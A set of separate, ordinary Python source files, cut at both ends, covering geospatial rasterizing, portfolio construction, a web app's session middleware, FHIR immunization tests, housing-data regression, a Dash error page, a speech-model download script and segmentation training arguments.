with open(os.path.join('data', 'lp', certificate_filename), 'w') as f:
f.write('# tableau = \n' + args.data + '\n')
f.write('# modulus = \n' + str(p) + '\n')
f.write('# bit-length = \n' + str(mpc.options.bit_length) + '\n')
f.write('# security parameter = \n' + str(mpc.options.security_parameter) + '\n')
f.write('# threshold = \n' + str(mpc.threshold) + '\n')
f.write('# common denominator = \n' + str(cd.value) + '\n')
f.write('# solution = \n')
f.write('\t'.join(str(x.value) for x in solution) + '\n')
f.write('# dual solution = \n')
f.write('\t'.join(str(x.value) for x in dual_solution) + '\n')
if __name__ == '__main__':
main()
|
import logging
import numpy
import sys
import rasterio
from rasterio.features import rasterize
from rasterio.transform import IDENTITY
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
logger = logging.getLogger('rasterize_geometry')
rows = cols = 10
geometry = {'type':'Polygon','coordinates':[[(2,2),(2,4.25),(4.25,4.25),(4.25,2),(2,2)]]}
with rasterio.drivers():
result = rasterize([geometry], out_shape=(rows, cols))
with rasterio.open(
"test.tif",
'w',
driver='GTiff',
width=cols,
height=rows,
count=1,
dtype=numpy.uint8,
nodata=0,
transform=IDENTITY,
crs={'init': "EPSG:4326"}) as out:
out.write_band(1, result.astype(numpy.uint8))
|
#!/usr/bin/env python
#
# Set up a virtualenv environment with the prerequisites for csrv.
# To use this, install virtualenv, run this script, and then run the generated
# csrv-bootstrap.py to create an environment with the needed dependencies.
#
import virtualenv
script = virtualenv.create_bootstrap_script('''
import os
import subprocess
def after_install(options, home_dir):
etc = os.path.join(home_dir, 'etc')
if not os.path.exists(etc):
os.makedirs(etc)
subprocess.call([
join(home_dir, 'bin', 'pip'), 'install', 'tornado',
])
''')
with open('csrv-bootstrap.py', 'w') as script_file:
script_file.write(script)
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from enum import Enum
from typing import Mapping, Sequence
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import BloombergTicker
from qf_lib.common.utils.dateutils.common_start_and_end import get_common_start_and_end
from qf_lib.containers.dataframe.cast_dataframe import cast_dataframe
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
from qf_lib.containers.dataframe.simple_returns_dataframe import SimpleReturnsDataFrame
from qf_lib.containers.series.simple_returns_series import SimpleReturnsSeries
from qf_lib.data_providers.bloomberg.bloomberg_data_provider import BloombergDataProvider
from qf_lib.portfolio_construction.portfolio_models.equal_risk_contribution_portfolio import \
EqualRiskContributionPortfolio
from qf_lib.portfolio_construction.portfolio_models.portfolio import Portfolio
class ChangeDirection(Enum):
RISING = 1
"""Rising"""
FALLING = 2
"""Failing"""
class RiskParityBoxes(object):
def __init__(self, boxes_dict: Mapping[ChangeDirection, Mapping[ChangeDirection, SimpleReturnsSeries]]):
self._boxes_dict = boxes_dict
def get_series(self, growth: ChangeDirection, inflation: ChangeDirection) -> SimpleReturnsSeries:
return self._boxes_dict[growth][inflation]
def as_list(self) -> Sequence[SimpleReturnsSeries]:
"""
Creates a list of series corresponding to risk parity boxes. Order of series:
(growth=RISING, inflation=RISING), (growth=RISING, inflation=FALLING), (growth=FALLING, inflation=RISING),
(growth=FALLING, inflation=FALLING).
"""
list_of_series = []
for growth in ChangeDirection:
for inflation in ChangeDirection:
series = self._boxes_dict[growth][inflation]
list_of_series.append(series)
return list_of_series
@staticmethod
def from_list(list_of_series: Sequence[SimpleReturnsSeries]) -> "RiskParityBoxes":
"""
Create a RiskParityBoxes instance from a list of series. The order in the list must be the following:
(growth=RISING, inflation=RISING), (growth=RISING, inflation=FALLING), (growth=FALLING, inflation=RISING),
(growth=FALLING, inflation=FALLING).
"""
series_iter = iter(list_of_series)
growth_to_inflation_to_series = dict()
for growth in ChangeDirection:
inflation_to_series = dict()
for inflation in ChangeDirection:
series = next(series_iter)
inflation_to_series[inflation] = series
growth_to_inflation_to_series[growth] = inflation_to_series
try:
next(series_iter)
raise ValueError("Got more series than expected: {:d}".format(len(list_of_series)))
except StopIteration:
pass # this error was expected
return RiskParityBoxes(growth_to_inflation_to_series)
class RiskParityBoxesFactory(object):
"""
Makes timeseries for risk parity boxes.
Parameters
----------
bbg_data_provider: BloombergDataProvider
reference to bloomberg data provider
"""
def __init__(self, bbg_data_provider: BloombergDataProvider):
self.bbg_data_provider = bbg_data_provider
# index: growth, columns: inflation
self.tickers_dict = self._create_tickers_dict()
self.all_tickers = self._get_all_tickers(self.tickers_dict)
def make_parity_boxes(self, start_date: datetime, end_date: datetime, frequency: Frequency = Frequency.DAILY) -> RiskParityBoxes:
"""
Downloads the needed data and makes parity boxes. Each box is one series of returns (starting at the first
date after start_date and ending at the end_date).
"""
asset_rets_df = self._get_assets_data(end_date, start_date, frequency)
# create a dict: growth -> inflation -> None
boxes_df = dict()
for growth in ChangeDirection:
inflation_to_rets_dict = dict()
for inflation in ChangeDirection:
tickers = self.tickers_dict[growth][inflation]
asset_rets_for_box_df = asset_rets_df.loc[:, tickers]
boxes_rets = self._calculate_box(asset_rets_for_box_df)
inflation_to_rets_dict[inflation] = boxes_rets
boxes_df[growth] = inflation_to_rets_dict
return RiskParityBoxes(boxes_df)
@staticmethod
def _create_tickers_dict():
# growth -> inflatoin -> tickers
tickers_dict = {
ChangeDirection.RISING: {
ChangeDirection.RISING: [
BloombergTicker("SPGSCITR Index"), # Commodities (S&P GSCI Total Return CME)
BloombergTicker("MSBIERTR Index"), # EM Debt (Morningstar Emerging Markets Corporate Bond Index TR)
BloombergTicker("XAU Curncy") # Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
],
ChangeDirection.FALLING: [
BloombergTicker("MXUS Index"), # Equity USA (MSCI USA)
BloombergTicker("LQD US Equity") # Credit (ISHARES IBOXX investment grade corporate bond etf)
]
},
ChangeDirection.FALLING: {
ChangeDirection.RISING: [
# ILB (Bloomberg Barclays US Inflation Linked Bonds 1 to 10 Year TR)
BloombergTicker("BCIT3T Index"),
# Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
BloombergTicker("XAU Curncy")
],
ChangeDirection.FALLING: [
BloombergTicker("IEF US Equity"), # Gov bonds (7-10y treasury)
BloombergTicker("XAU Curncy") # Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
]
}
}
return tickers_dict
@staticmethod
def _get_all_tickers(tickers_dict):
all_tickers = set()
for inflation_to_tickers in tickers_dict.values():
for tickers in inflation_to_tickers.values():
all_tickers.update(tickers)
return sorted(list(all_tickers))
def _get_assets_data(self, end_date, start_date, frequency):
# download data
asset_prices_df = self.bbg_data_provider.get_price(self.all_tickers, PriceField.Close, start_date, end_date, frequency)
asset_prices_df = cast_dataframe(asset_prices_df, output_type=PricesDataFrame)
# trim
common_start, common_end = get_common_start_and_end(asset_prices_df)
trimmed_asset_prices_df = asset_prices_df.loc[common_start:common_end, :] # type: PricesDataFrame
# remove intermediate NaNs
trimmed_asset_prices_df = trimmed_asset_prices_df.fillna(method='pad') # forward fill
# convert to simple returns
assets_rets = trimmed_asset_prices_df.to_simple_returns()
return assets_rets
@staticmethod
def _calculate_box(asset_returns_df: SimpleReturnsDataFrame) -> SimpleReturnsSeries:
portfolio = EqualRiskContributionPortfolio(asset_returns_df.cov())
weights = portfolio.get_weights()
portfolio_rets, _ = Portfolio.constant_weights(asset_returns_df, weights)
return portfolio_rets
|
import os
from pathlib import Path
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler
from watchdog.observers import Observer
from mitama._extra import _Singleton
from mitama.app.http import Response
from mitama.app.app import _session_middleware
from .method import group
from .router import Router
class AppRegistry(_Singleton):
"""稼働しているアプリのレジストリ
サーバー内で稼働しているアプリのパスやパッケージ名が登録されているレジストリです。
mitama.jsonを読み込んでアプリを起動するクラスでもあります。
dictっぽくアプリの取得や配信の停止などが可能です。
"""
_map = dict()
_server = None
_router = None
def __init__(self):
super().__init__()
def __iter__(self):
for app in self._map.values():
yield app
def __setitem__(self, app_name, app):
app.project = self.project
self._map[app_name] = app
def sorter(x):
x_ = x[1].path
if x_[-1] != "/":
x_ += "/"
return -1 * len(x_.split('/'))
self._map = dict(
sorted(
self._map.items(),
key=sorter
)
)
def __getitem__(self, app_name):
return self._map[app_name]
def __delitem__(self, app_name):
del self._map[app_name]
def reset(self):
"""アプリの一覧をリセットします"""
self._map = dict()
def router(self):
"""アプリの情報に基づいてルーティングエンジンを生成します"""
from mitama.app.method import view
from mitama.utils.controllers import static_files
if self._router is None:
app_mod_dir = Path(os.path.dirname(__file__))
router = Router(
[
view("/_mitama/<path:path>", static_files(app_mod_dir / "static"))
],
middlewares=[_session_middleware()]
)
for app in self:
router.add_route(group(app.path, app))
self._router = router
return self._router
def _session_middleware():
import base64
from Crypto.Random import get_random_bytes
from mitama.app import Middleware
from mitama.app.http.session import EncryptedCookieStorage
if "MITAMA_SESSION_KEY" in os.environ:
session_key = os.environ["MITAMA_SESSION_KEY"]
elif os.path.exists(".tmp/MITAMA_SESSION_KEY"):
with open(".tmp/MITAMA_SESSION_KEY", "r") as f:
session_key = f.read()
else:
key = get_random_bytes(16)
session_key = base64.urlsafe_b64encode(key).decode("utf-8")
if not os.path.exists(".tmp"):
os.mkdir(".tmp")
with open(".tmp/MITAMA_SESSION_KEY", "w") as f:
f.write(session_key)
class SessionMiddleware(Middleware):
fernet_key = session_key
def __init__(self, app = None):
self.app = app
secret_key = base64.urlsafe_b64decode(
self.fernet_key.encode("utf-8")
)
cookie_storage = EncryptedCookieStorage(secret_key)
self.storage = cookie_storage
def process(self, request, handler):
request["mitama_session_storage"] = self.storage
raise_response = False
response = handler(request)
if not isinstance(response, Response):
return response
session = request.get("mitama_session")
if session is not None:
if session._changed:
self.storage.save_session(request, response, session)
if raise_response:
raise response
return response
return SessionMiddleware
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import immunization
def impl_immunization_1(inst):
assert inst.date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.doseQuantity.code == "mg"
assert inst.doseQuantity.system == "http://unitsofmeasure.org"
assert float(inst.doseQuantity.value) == float(5)
assert inst.encounter.reference == "Encounter/example"
assert inst.expirationDate == fhirtypes.Date.validate("2015-02-15")
assert inst.explanation.reason[0].coding[0].code == "429060002"
assert inst.explanation.reason[0].coding[0].system == "http://snomed.info/sct"
assert inst.id == "example"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.location.reference == "Location/1"
assert inst.lotNumber == "AAJN11K"
assert inst.manufacturer.reference == "Organization/hl7"
assert inst.notGiven is False
assert inst.note[0].text == "Notes on adminstration of vaccine"
assert inst.patient.reference == "Patient/example"
assert inst.practitioner[0].actor.reference == "Practitioner/example"
assert inst.practitioner[0].role.coding[0].code == "OP"
assert inst.practitioner[0].role.coding[0].system == "http://hl7.org/fhir/v2/0443"
assert inst.practitioner[1].actor.reference == "Practitioner/example"
assert inst.practitioner[1].role.coding[0].code == "AP"
assert inst.practitioner[1].role.coding[0].system == "http://hl7.org/fhir/v2/0443"
assert inst.primarySource is True
assert inst.reaction[0].date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.reaction[0].detail.reference == "Observation/example"
assert inst.reaction[0].reported is True
assert inst.route.coding[0].code == "IM"
assert inst.route.coding[0].display == "Injection, intramuscular"
assert inst.route.coding[0].system == "http://hl7.org/fhir/v3/RouteOfAdministration"
assert inst.site.coding[0].code == "LA"
assert inst.site.coding[0].display == "left arm"
assert inst.site.coding[0].system == "http://hl7.org/fhir/v3/ActSite"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccinationProtocol[0].authority.reference == "Organization/hl7"
assert inst.vaccinationProtocol[0].description == "Vaccination Protocol Sequence 1"
assert inst.vaccinationProtocol[0].doseSequence == 1
assert inst.vaccinationProtocol[0].doseStatus.coding[0].code == "count"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].display == "Counts"
assert (
inst.vaccinationProtocol[0].doseStatus.coding[0].system
== "http://hl7.org/fhir/vaccination-protocol-dose-status"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].code == "coldchbrk"
assert (
inst.vaccinationProtocol[0].doseStatusReason.coding[0].display
== "Cold chain break"
)
assert (
inst.vaccinationProtocol[0].doseStatusReason.coding[0].system
== "http://hl7.org/fhir/vaccination-protocol-dose-status-reason"
)
assert inst.vaccinationProtocol[0].series == "Vaccination Series 1"
assert inst.vaccinationProtocol[0].seriesDoses == 2
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].code == "1857005"
assert (
inst.vaccinationProtocol[0].targetDisease[0].coding[0].system
== "http://snomed.info/sct"
)
assert inst.vaccineCode.coding[0].code == "FLUVAX"
assert inst.vaccineCode.coding[0].system == "urn:oid:1.2.36.1.2001.1005.17"
assert inst.vaccineCode.text == "Fluvax (Influenza)"
def test_immunization_1(base_settings):
"""No. 1 tests collection for Immunization.
Test File: immunization-example.json
"""
filename = base_settings["unittest_data_dir"] / "immunization-example.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_1(inst2)
def impl_immunization_2(inst):
assert inst.date == fhirtypes.DateTime.validate("2012-01-15")
assert inst.id == "historical"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.location.reference == "Location/1"
assert inst.notGiven is False
assert inst.note[0].text == "Notes on adminstration of a historical vaccine"
assert inst.patient.reference == "Patient/example"
assert inst.primarySource is False
assert inst.reportOrigin.coding[0].code == "record"
assert (
inst.reportOrigin.coding[0].system == "http://hl7.org/fhir/immunization-origin"
)
assert inst.reportOrigin.text == "Written Record"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "GNFLU"
assert inst.vaccineCode.coding[0].system == "urn:oid:1.2.36.1.2001.1005.17"
assert inst.vaccineCode.text == "Influenza"
def test_immunization_2(base_settings):
"""No. 2 tests collection for Immunization.
Test File: immunization-example-historical.json
"""
filename = (
base_settings["unittest_data_dir"] / "immunization-example-historical.json"
)
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_2(inst2)
def impl_immunization_3(inst):
assert inst.date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.explanation.reasonNotGiven[0].coding[0].code == "MEDPREC"
assert inst.explanation.reasonNotGiven[0].coding[0].display == "medical precaution"
assert (
inst.explanation.reasonNotGiven[0].coding[0].system
== "http://hl7.org/fhir/v3/ActReason"
)
assert inst.id == "notGiven"
assert inst.notGiven is True
assert inst.patient.reference == "Patient/example"
assert inst.primarySource is True
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "01"
assert inst.vaccineCode.coding[0].display == "DTP"
assert inst.vaccineCode.coding[0].system == "http://hl7.org/fhir/sid/cvx"
def test_immunization_3(base_settings):
"""No. 3 tests collection for Immunization.
Test File: immunization-example-refused.json
"""
filename = base_settings["unittest_data_dir"] / "immunization-example-refused.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_3(inst2)
|
# Something
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def graph_scatter(sdlabel,
xdata,
ydata,
ax,
mtitle = '',
xtitle = '',
ytitle = '',
color = 'b',
xlabel = True):
r""" Generic 1D plotting function for data
"""
ax.set_title(mtitle)
ax.set_ylabel(ytitle)
if xlabel: ax.set_xlabel(xtitle)
ax.scatter(xdata, ydata, color = color, label = sdlabel)
|
from house_regresion.housing_data import load_housing_data
from sklearn.model_selection import train_test_split, StratifiedShuffleSplit
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import LabelBinarizer
from house_regresion.custom_transformer import CombinedAttributesAdder
from pandas import DataFrame
import numpy as np
# fetch_housing_data()
housing = load_housing_data()
train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
# creem o categorie de venit
housing['income-cat'] = np.ceil(housing['median_income'] / 1.5)
housing['income-cat'].where(housing['income-cat'] < 5, 5.0, inplace=True)
# creem noi categorii
# housing['room_per_household'] = housing['total_rooms'] / housing['households']
# housing['bedroom_per_room'] = housing['total_bedrooms'] / housing['total_rooms']
# housing['population_per_household'] = housing['population'] / housing['households']
print(housing.keys())
# print(housing.values[:4])
attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)
housing_added_attr = attr_adder.transform(housing.values)
# print(housing_added_attr)
# Replace missing values whit median value
imputer = SimpleImputer(strategy="median")
housing_num = housing.drop('ocean_proximity', axis=1)
imputer.fit(housing_num)
X = imputer.transform(housing_num)
# Back into pandas DataFrame from numpy array
housing_tr = DataFrame(X, columns=housing_num.columns)
# Convert ocean_proximity labels tu numbers
# encoder = LabelEncoder()
housing_cat = housing['ocean_proximity']
# housing_cat_encoded = encoder.fit_transform(housing_cat)
# print(encoder.classes_)
# print(housing_cat_encoded)
# hot_encoder = OneHotEncoder()
# housing_cat_1hot = hot_encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))
encoder = LabelBinarizer(sparse_output=True)
housing_cat_1hot = encoder.fit_transform(housing_cat)
print(housing_cat_1hot.toarray())
# print(imputer.statistics_[0])
# print(housing_num.median().values)
# print(housing['income-cat'].value_counts())
# print(housing['ocean_proximity'])
# Creem o esalonare stratificata in functie de categoria de pret
stratified_split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
strat_train = None
strat_test = None
for train_index, test_index in stratified_split.split(housing, housing['income-cat']):
strat_train = housing.loc[train_index]
strat_test = housing.loc[test_index]
for set in (strat_train, strat_test):
set.drop(['income-cat'], axis=1, inplace=True)
# play_data = strat_train.copy()
# play_data.plot(kind='scatter', x='longitude', y='latitude', alpha=0.1)
# corr_matrix = housing.corr()
# print(corr_matrix['median_house_value'].sort_values(ascending=False))
# housing.plot(kind="scatter", x="longitude", y="latitude", alpha=0.4, s=housing["population"] / 100, label="population",
# c="median_house_value", cmap=plt.get_cmap("jet"), colorbar=True)
# plt.legend()
# plt.show()
# print(strat_train.describe().to_string())
# print(f'train: {len(train_set)}, test: {len(test_set)}')
# print(housing.info())
# housing.hist(bins=50, figsize=(25,15))
# plt.show()
# attributes = ["median_house_value", "median_income", "total_rooms", "housing_median_age"]
# scatter_matrix(housing[attributes], figsize=(12,8))
# plt.show()
|
# package imports
from dash import html
import dash_bootstrap_components as dbc
layout = dbc.Container(
[
html.Div(
dbc.Container(
[
html.H1(
[
html.I(className='fas fa-skull-crossbones'),
'404 Error',
html.I(className='fas fa-skull-crossbones')
],
className='display-3'
),
html.P(
'Page not found.',
className='lead',
),
html.Hr(className='my-2'),
html.P(
dbc.Button(
'Home',
color='primary',
href='/'
),
className='lead'
),
],
fluid=True,
className='py-3',
),
className='my-2 bg-light rounded-3',
)
]
)
|
#!venv/bin/python
from stt_api import app
import os
import requests
import tqdm
if __name__ == "__main__":
for asr_model_type in app.config['ASR_MODELS']:
print("Checking if models exist.")
asr_model = app.config['ASR_MODELS'][asr_model_type]
model_path = f"{app.config['ASR_MODEL_FOLDER']}/{asr_model}.nemo"
if not os.path.exists(model_path):
URL = f"https://api.ngc.nvidia.com/v2/models/nvidia/nemo/{asr_model}/versions/1.6.0/files/{asr_model}.nemo"
print(f"Downloading missing model {asr_model} from {URL}")
response = requests.get(URL, stream=True)
block_size = 1024 * 1024
total_size_in_bytes = int(response.headers.get('content-length', 0))
total_chunks = 0
progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(model_path, 'wb') as of:
for chunk in response.iter_content(chunk_size=block_size):
if chunk:
progress_bar.update(len(chunk))
of.write(chunk)
app.run(host="0.0.0.0", debug=True)
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import argparse
#import argparse
import torch
def add_parser_params(parser):
"""add argument to the parser"""
# checkpoint
parser.add_argument('--resume', type=str, default=None,
help='put the path to resuming file if needed')
parser.add_argument('--checkname', type=str, default=None,
help='the name of the checkpoint.')
parser.add_argument('--save_ckpt_steps', type=int, default=500,
help='save checkpoints per save_ckpt_steps')
parser.add_argument('--max_ckpt_nums', type=int, default=15,
help='the max numbers of checkpoints')
parser.add_argument('--model_dir', type=str, default='/home/zhaoshuai/models/deeplabv3_cbl_2/',
help='Base directory for the model.')
parser.add_argument('--output_dir', type=str, default='/home/zhaoshuai/models/deeplabv3_cbl_2/',
help='output directory of model.')
# base model and the network
parser.add_argument('--seg_model', type=str, default='deeplabv3',
choices=['deeplabv3', 'deeplabv3+', 'pspnet'],
help='The segmentation model.')
parser.add_argument('--backbone', type=str, default='resnet101',
choices=['resnet50', 'resnet101', 'resnet152',
'resnet50_beta', 'resnet101_beta', 'resnet152_beta'],
help='backbone name (default: resnet101)')
parser.add_argument('--out_stride', type=int, default=16,
help='network output stride (default: 16)')
# batch size and crop size
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='input batch size for training (default: auto)')
parser.add_argument('--accumulation_steps', type=int, default=1, metavar='N',
help='Accumulation steps when calculate the gradients when training')
parser.add_argument('--test_batch_size', type=int, default=None, metavar='N',
help='input batch size for testing (default: auto)')
# dataset information
parser.add_argument('--dataset', type=str, default='pascal' ,
choices=['pascal', 'coco', 'cityscapes', 'camvid'],
help='dataset name (default: pascal)')
parser.add_argument('--train_split', type=str, default='train' ,
choices=['train', 'trainaug', 'trainval', 'val', 'test'],
help='training set name (default: train)')
parser.add_argument('--data_dir', type=str, default='/dataset',
help='Path to the directory containing the PASCAL VOC data.')
parser.add_argument('--use_sbd', action='store_true', default=False,
help='whether to use SBD dataset (default: True)')
parser.add_argument('--workers', type=int, default=8, metavar='N',
help='dataloader threads')
parser.add_argument('--base_size', type=int, default=513, help='base image size')
parser.add_argument('--crop_size', type=int, default=513, help='crop image size')
# batch normalization
parser.add_argument('--sync_bn', type=bool, default=None,
help='whether to use sync bn (default: auto)')
parser.add_argument('--freeze_bn', type=bool, default=False,
help='whether to freeze bn parameters (default: False)')
parser.add_argument('--bn_mom', type=float, default=0.1, metavar='M',
help='momentum (default: 0.1) for running mean and var of batch normalization')
# training hyper params
parser.add_argument('--epochs', type=int, default=46, metavar='N',
help='Number of training epochs: '
'For 30K iteration with batch size 6, train_epoch = 17.01 (= 30K * 6 / 10,582). '
'For 30K iteration with batch size 8, train_epoch = 22.68 (= 30K * 8 / 10,582). '
'For 30K iteration with batch size 10, train_epoch = 25.52 (= 30K * 10 / 10,582). '
'For 30K iteration with batch size 11, train_epoch = 31.19 (= 30K * 11 / 10,582). '
'For 30K iteration with batch size 12, train_epoch = 34.02 (= 30K * 12 / 10,582). '
'For 30K iteration with batch size 14, train_epoch = 39.69 (= 30K * 14 / 10,582). '
'For 30K iteration with batch size 15, train_epoch = 42.53 (= 30K * 15 / 10,582). '
'For 30K iteration with batch size 16, train_epoch = 45.36 (= 30K * 16 / 10,582).')
parser.add_argument('--start_epoch', type=int, default=0,
metavar='N', help='start epochs (default:0)')
parser.add_argument('--init_global_step', type=int, default=0,
help='Initial global step for controlling learning rate when fine-tuning model.')
parser.add_argument('--use_balanced_weights', action='store_true', default=False,
help='whether to use balanced weights (default: False)')
# optimizer params, such as learning rate
parser.add_argument('--init_lr', type=float, default=0.007,
help='learning rate (default: auto)')
parser.add_argument('--lr_multiplier', type=float, default=1.0,
help='Learning rate multiplier for the unpretrained model.')
parser.add_argument('--slow_start_lr', type=float, default=1e-4,
help='Learning rate employed during slow start.')
parser.add_argument('--slow_start_steps', type=int, default=0,
help='Training model with small learning rate for few steps.')
parser.add_argument('--lr_scheduler', type=str, default='poly',
choices=['poly', 'step', 'cos'],
help='lr scheduler mode: (default: poly)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='momentum (default: 0.9)')
parser.add_argument('--weight_decay', type=float, default=1e-4,
metavar='M', help='w-decay (default: 1e-4)')
parser.add_argument('--nesterov', action='store_true', default=False,
help='whether use nesterov (default: False)')
# cuda, seed and logging
parser.add_argument('--no_cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--gpu_ids', type=str, default='0',
help='use which gpu to train, must be a comma-separated list of integers only (default=0)')
parser.add_argument('--main_gpu', type=int, default=0,
help='The main gpu')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
# finetuning pre-trained models
parser.add_argument('--ft', action='store_true', default=False,
help='finetuning on a different dataset')
# evaluation option
parser.add_argument('--eval_interval', type=int, default=2,
help='evaluuation interval (default: 2)')
parser.add_argument('--no_val', action='store_true', default=False,
help='skip validation during training')
# loss type
parser.add_argument('--loss_type', type=int, default=0,
help='The loss type used.')
parser.add_argument('--loss_weight_lambda', type=float, default=0.5,
help='The realtive weight factor for the loss.')
# process info
parser.add_argument('--proc_name', type=str, default='DeepLabv3',
help='The name of the process.')
# region mutual information
parser.add_argument('--rmi_pool_way', type=int, default=1,
help="The pool way when calculate RMI loss, 1 - avg pool, 0 - max pool")
parser.add_argument('--rmi_pool_size', type=int, default=2,
help="The pool size of the pool operation before calculate RMI loss")
parser.add_argument('--rmi_pool_stride', type=int, default=2,
help="The pool stride of the pool operation before calculate RMI loss")
parser.add_argument('--rmi_radius', type=int, default=3,
help="The square radius of rmi [1, 3, 5, 7], they have a center")
# CRF iter steps
parser.add_argument('--crf_iter_steps', type=int, default=1,
help='The iter steps of the crf')
# torch.parallel.DistributedDataParallel(), not avaliable now.
parser.add_argument('--local_rank', type=int, default=0)
parser.add_argument('--world_size', default=-1, type=int, help='number of nodes for distributed training')
parser.add_argument('--dist_backend', default='nccl', type=str, help='distributed backend')
parser.add_argument('--multiprocessing_distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
# parse
args, unparsed = parser.parse_known_args()
# RMI parameters
args.rmi_pool_stride = args.rmi_pool_size
# use gpu or not
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
try:
args.gpu_ids = [int(s) for s in args.gpu_ids.split(',')]
args.gpu_ids = [i for i in range(0, len(args.gpu_ids))]
except ValueError:
raise ValueError('Argument --gpu_ids must be a comma-separated list of integers only')
# We only have one node and N GPUs.
args.world_size = int(len(args.gpu_ids))
# distributed parrallel or not
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
# use synchronized batch normalization across multi gpus, or not
if args.sync_bn is None:
args.sync_bn = True if (args.cuda and len(args.gpu_ids) > 1) else False
# default settings for epochs, batch_size and lr
if args.epochs is None:
epoches = {
'coco': 30,
'cityscapes': 200,
'pascal': 46,
}
args.epochs = epoches[args.dataset.lower()]
# train batch size
assert args.accumulation_steps in [1, 2, 4]
assert args.batch_size in [4, 8, 12, 16, 32, 36, 48, 64]
args.batch_size = args.batch_size // args.accumulation_steps
# test batch size
if args.test_batch_size is None:
args.test_batch_size = args.batch_size
# learning rate
if args.init_lr is None:
lrs = {
'coco': 0.1,
'cityscapes': 0.01,
'pascal': 0.007,
}
args.init_lr = lrs[args.dataset.lower()] / (4 * len(args.gpu_ids)) * args.batch_size
# checkpoint name
if args.checkname is None:
args.checkname = str(args.seg_model) + str(args.backbone)
# some default parameters to ensure the justice of the experiments.
if args.backbone in ['resnet101']:
args.weight_decay = 1e-4
args.bn_mom = 0.05
if args.seg_model == 'deeplabv3':
# the default setting for deeplabv3
args.lr_multiplier = 10.0
elif args.seg_model == 'deeplabv3+':
# the default setting for deeplabv3+
args.lr_multiplier = 5.0
elif args.seg_model == 'pspnet':
# the default setting for pspnet
args.lr_multiplier = 10.0
else:
raise NotImplementedError
else:
args.weight_decay = 4e-5
args.bn_mom = 0.0003
# dataset related paramters
if 'pascal' in args.dataset:
args.slow_start_steps = 1500
elif 'cityscapes' in args.dataset:
args.slow_start_steps = 3000
elif 'camvid' in args.dataset:
args.slow_start_steps = 300
args.init_lr = 0.025
args.lr_multiplier = 10.0
else:
raise NotImplementedError
return args
def save_hp_to_json(args):
"""Save hyperparameters to a json file
"""
if args.freeze_bn is False:
filename = os.path.join(args.model_dir, 'hparams01.json')
else:
filename = os.path.join(args.model_dir, 'hparams02.json')
#hparams = FLAGS.flag_values_dict()
hparams = vars(args)
with open(filename, 'w') as f:
json.dump(hparams, f, indent=4, sort_keys=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="PyTorch Segmentation Model Training")
args = add_parser_params(parser)
print(args)
|
import argparse
import pkg_resources
from argparse import Namespace
def get_package_templates():
models = {}
